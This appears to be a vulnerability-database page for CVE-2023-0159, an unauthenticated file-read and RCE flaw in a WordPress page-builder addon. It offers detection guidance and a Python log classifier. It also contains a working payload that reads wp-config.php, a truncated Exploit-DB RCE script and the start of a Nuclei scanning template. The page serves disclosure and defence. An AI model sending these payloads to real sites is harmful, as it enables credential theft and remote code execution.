CVE-2023-0159
Published: 2023-02-13
Priority: P182 · Severity: high · CVSS 3.1 base score: 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Tags: ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 55.74% (98.9th percentile)
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the PHP extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the host's file system. This may be escalated to RCE using PHP filter chains.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wprealize | extensive_vc_addons_for_wpbakery_page_builder | < 1.9.1 | 1.9.1 |
Detection & IOCs
Request body (IOC type: command): `action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php`
- Detect exploitation attempts by monitoring POST requests to /wp-admin/admin-ajax.php containing the action parameter 'extensive_vc_init_shortcode_pagination' combined with 'options[template]' containing a php:// filter wrapper.
- Successful exploitation returns a JSON response body containing the string '{"status":"success","message":"Items are loaded","data":' — match this in HTTP response bodies alongside the above request pattern to confirm LFI/RCE.
- RCE escalation uses PHP filter chains passed via options[template]; look for long php://filter/convert.iconv.* chains in the POST body to /wp-admin/admin-ajax.php with action=extensive_vc_init_shortcode_pagination.
- Presence of the plugin directory /wp-content/plugins/extensive-vc-addon/ in HTTP responses can be used to fingerprint vulnerable targets for proactive scanning.
- The vulnerability is unauthenticated — no session cookie or authentication token is required to exploit it. Detection rules must not filter out unauthenticated requests to admin-ajax.php.
- The PHP filter chain RCE payload can be arbitrarily long and varied (different iconv conversion sequences per character), making static payload matching insufficient; focus on the action name and the php:// scheme prefix in options[template].
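The detection guidance above, turned into runnable logic as an added example (this is not code from the original page, the plugin vendor, or any of the listed sources). It classifies request/response records against the indicators listed: the vulnerable action name, a php:// wrapper in options[template] (also when percent-encoded), a count of convert.iconv hops as the chain heuristic, and the success marker in the response to distinguish an attempt from a confirmed read. The record layout and all sample values are constructed for illustration; record 4 uses made-up charset names rather than a real filter chain.

```python
"""Detection logic for CVE-2023-0159 exploitation attempts.

Added example (not from the original page or the plugin vendor). It applies
the listed indicators to constructed sample request/response records; the
record layout and sample values are assumptions for illustration.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "extensive_vc_init_shortcode_pagination"
# Response prefix that the sources report as the success marker
SUCCESS_MARKER = '{"status":"success","message":"Items are loaded","data":'
PLUGIN_DIR = "/wp-content/plugins/extensive-vc-addon/"
PHP_WRAPPER = re.compile(r"^\s*php://", re.IGNORECASE)

# Constructed sample records (method, path, POST body, HTTP status, response body).
# Record 4 uses made-up charset names (AAA.BBB, ...) in place of a real filter chain.
SAMPLE_LOGS: List[Tuple[str, str, str, int, str]] = [
    ("POST", AJAX_PATH,
     "action=extensive_vc_init_shortcode_pagination"
     "&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php",
     200, '{"status":"success","message":"Items are loaded","data":"ZGVmaW5l..."}'),
    ("POST", AJAX_PATH, "action=heartbeat&_nonce=abc123", 200, '{"server_time":1}'),
    ("POST", AJAX_PATH,
     "action=extensive_vc_init_shortcode_pagination&options[template]=blog-list",
     200, '{"status":"success","message":"Items are loaded","data":"<div>...</div>"}'),
    ("POST", AJAX_PATH,
     "action=extensive_vc_init_shortcode_pagination&options%5Btemplate%5D="
     "php%3A%2F%2Ffilter%2Fconvert.iconv.AAA.BBB%7Cconvert.iconv.CCC.DDD"
     "%7Cconvert.iconv.EEE.FFF%2Fresource%3DPLACEHOLDER",
     200, '{"status":"error"}'),
    ("GET", "/wp-content/plugins/extensive-vc-addon/assets/css/main.css", "", 200, "body{}"),
]


def template_param(body: str) -> Optional[str]:
    """Return the percent-decoded options[template] value from a form body, or None."""
    values = parse_qs(body, keep_blank_values=True).get("options[template]")
    return values[0] if values else None


def classify(method: str, path: str, body: str, status: int, response: str) -> Tuple[str, str]:
    """Classify one request/response pair.

    Verdicts: ignore (not relevant), benign (vulnerable action, no wrapper),
    attempt (php:// wrapper sent, no success marker), confirmed (wrapper sent
    and the success marker came back). No authentication check is applied,
    because the endpoint is reachable without a session.
    """
    if method != "POST" or path != AJAX_PATH:
        return "ignore", "not a POST to admin-ajax.php"
    action = parse_qs(body, keep_blank_values=True).get("action", [""])[0]
    if action != VULN_ACTION:
        return "ignore", f"action {action!r} is not the vulnerable action"
    template = template_param(body)
    if template is None or not PHP_WRAPPER.match(template):
        return "benign", "vulnerable action without a php:// wrapper in options[template]"
    # Several convert.iconv hops point to a filter chain (RCE escalation) rather than
    # a single file read; the exact sequence varies per payload, so count hops
    # instead of matching a fixed string.
    hops = template.lower().count("convert.iconv.")
    kind = "filter chain (possible RCE)" if hops >= 2 else "php:// wrapper (file read)"
    if response.startswith(SUCCESS_MARKER):
        return "confirmed", f"{kind}, {hops} iconv hops, success marker in response"
    return "attempt", f"{kind}, {hops} iconv hops, no success marker"


def scan(records) -> List[Tuple[str, str]]:
    """Classify every record; the HTTP status is carried for logging only."""
    return [classify(*rec) for rec in records]


def plugin_exposed(html: str) -> bool:
    """Asset-inventory check: does a page of our own site reference the plugin directory?"""
    return PLUGIN_DIR in html


if __name__ == "__main__":
    for rec, (verdict, detail) in zip(SAMPLE_LOGS, scan(SAMPLE_LOGS)):
        print(f"{verdict:9s} {rec[0]} {rec[1]}: {detail}")
```

Record 3 shows why the response marker alone must not raise an alert: the plugin returns the same JSON on legitimate pagination calls, so only the combination of the php:// wrapper in the request and the marker in the response is treated as confirmed. `plugin_exposed` is meant for checking your own sites' HTML during inventory, so that instances of the plugin below 1.9.1 can be found and updated.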
CVSS provenance
- NVD (v3.1): 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- VulnCheck: 7.5 HIGH
GHSA
GHSA-c4h9-8c9r-v3m8 · ghsa_unreviewed · 2023-02-13 · CVE-2023-0159 [HIGH] · CWE-22
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the PHP extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the host's file system.
VulnCheck
Extensive VC Addons for WPBakery Php Extract Function Unauthenticated RCE
vulncheck · 2023 · CVSS 7.5 · CVE-2023-0159 [HIGH]
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the PHP extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the host's file system. This may be escalated to RCE using PHP filter chains.
Affected: wprealize extensive_vc_addons_for_wpbakery_page_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-08-17&host_type=src&vulnerability=cve-2023-0159; h
No detection rules found.
Exploit-DB
Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)
exploitdb · 2025-03-19 · CVSS 7.5 · CVE-2023-0159 [HIGH]
---
```python
# Exploit Title: Extensive VC Addons for WPBakery page builder '
    # Generate filter chain
    try:
        result = subprocess.run(
            [generator_path, '--chain', php_code],
            capture_output=True,
            text=True,
            check=True
        )
    payload = None
    for line in result.stdout.split('\n'):
        if line.startswith('php://filter'):
            payload = line.strip()
            break
    if not payload:
        print("[-] Failed to generate payload")
        return
    url = f"{target}/wp-admin/admin-ajax.php"
    data = {'action': 'extensive_vc_init_shortcode_pagination', 'options[template]': payload}
    print(f"[*] Sending payload for command: {command}")
    start_time = time.time()
    # Send the request to attempt RCE and don't forget to pass the generator path
    response = requests.post(url, data=d
```
Nuclei
Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
nuclei · CVSS 7.5 · CVE-2023-0159 [HIGH]
The plugin does not validate a parameter passed to the PHP extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the host's file system. This may be escalated to RCE using PHP filter chains.
Template:
```yaml
id: CVE-2023-0159
info:
  name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
  author: c4sper0
  severity: high
  description: |
    The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
  impact: |
    Un
```